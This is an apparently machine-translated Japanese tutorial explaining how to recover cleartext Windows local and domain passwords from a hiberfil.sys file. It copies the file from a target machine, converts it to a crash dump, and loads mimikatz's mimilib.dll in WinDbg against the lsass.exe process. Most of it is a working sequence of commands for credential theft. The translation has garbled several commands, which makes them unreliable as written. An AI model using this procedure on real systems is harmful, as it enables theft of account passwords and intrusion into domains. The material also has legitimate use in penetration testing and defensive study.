hiberfil.sysからのローカルおよびドメインパスワードの回復

オープンフォームでLSAからWindows資格情報を抽出できるmimikatzユーティリティは、2012年から存在していますが、実行中のOSのメモリからパスワードを回復するための明るい機能に加えて、もう1つのかなり興味深い機能があります。 次に、簡単な手順を使用してhiberfil.sysファイルから資格情報を抽出する方法について、順を追って説明します。



準備する



計画を実施するには、次のユーティリティが必要です。



アクション



1.ターゲットマシンからhiberfil.sysファイルを取得します。



2.ファイルをWinDbgが理解できる形式に変換します。



hibr2dmp.exe d:\ temp \ hiberfil.sys c:\ temp \ hiberfil.dmp



このプロセスにはかなり時間がかかる場合があります。



画像



3. WinDbgを実行し、結果のファイルを開きます。



ファイル->クラッシュダンプを開く



4.デバッグシンボルを構成します。



ファイル->シンボルファイルパス...を開き、次の行を入力します。



SRV * c:\シンボル* http://msdl.microsoft.com/download/symbols



画像



c:\シンボルの代わりに、当然、シンボルがロードされるディレクトリがあります



デバッガーのコマンドラインでは、次のように記述します。



0:kd> .reload / n



キャラクターのロードを待っています:



画像



5. mimilib.dllライブラリへのパスを指定します(mimikatzのあるディレクトリにあります)。



0:kd> .load z:\ Soft \ Security \ Passwords \ Mimikatz \ x64 \ mimilib.dll



画像



6. lsass.exeプロセスのアドレスを見つけます。



0:kd> !プロセス0 0 lsass.exe



画像



この場合、アドレスはfffffa800a7d9060です。



7.プロセスのコンテキストを切り替えます。



0:kd> .process / r / p fffffa800a7d9060



画像



8. mimikatzを実行し、クリアテキストでパスワードを取得します。



0:kd> !ミミカッツ



画像



関連リンク



Microsoft Windows資格情報開示: http : //www.securitylab.ru/vulnerability/420418.php

LSA認証: https : //msdn.microsoft.com/en-us/library/windows/desktop/aa378326(v=vs.85).aspx

:何のための認証ダイジェストですhttps://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx



All Articles